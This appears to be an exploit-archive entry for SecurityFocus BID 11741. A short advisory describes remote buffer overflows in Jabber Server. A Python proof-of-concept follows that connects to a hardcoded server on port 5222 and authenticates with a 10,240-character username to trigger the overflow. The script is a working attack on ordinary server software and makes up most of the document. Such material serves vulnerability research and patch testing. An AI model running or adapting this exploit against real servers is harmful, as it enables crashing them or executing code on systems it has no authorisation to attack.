16 lines
No EOL
789 B
Python
Executable file
16 lines
No EOL
789 B
Python
Executable file
source: https://www.securityfocus.com/bid/11741/info
|
|
|
|
Multiple remote buffer overflow vulnerabilities affect the Jabber Server. These issues are due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.
|
|
|
|
An attacker may leverage these issues to execute arbitrary code on a computer with the privileges of the server process. This may facilitate unauthorized access or privilege escalation.
|
|
|
|
#!/usr/bin/python
|
|
import xmpp
|
|
name = 'a'*10240
|
|
# Born a client
|
|
cl=xmpp.Client('localhost')
|
|
if not cl.connect(server=('192.168.10.138',5222)):
|
|
raise IOError('Can not connect to server.')
|
|
if not cl.auth(name,'jabberuserpassword','optional resource name'):
|
|
raise IOError('Can not auth with server.')
|
|
cl.disconnect() |